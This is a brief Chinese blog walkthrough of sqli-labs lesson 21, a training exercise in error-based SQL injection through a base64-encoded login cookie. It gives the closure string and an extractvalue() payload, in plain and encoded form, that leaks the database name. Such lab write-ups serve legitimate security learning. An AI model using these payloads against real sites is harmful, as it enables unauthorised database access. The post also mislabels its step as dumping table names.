SQLI DUMB SERIES-21

Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

(1)登录成功后有以下页面:

其中红圈内的字符为admin的BASED64编码后的字符。

(2)用burp抓包,再刷新浏览器。

寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs=

闭合方式为' )

(3)开始报错注入,需要将payload用based63编码输入。例如:爆表名

admin') and extractvalue(1,concat(0x7e,(select database())))and ('

 编码:

YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpYW5kICgn

 

由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/momoli/p/10706303.html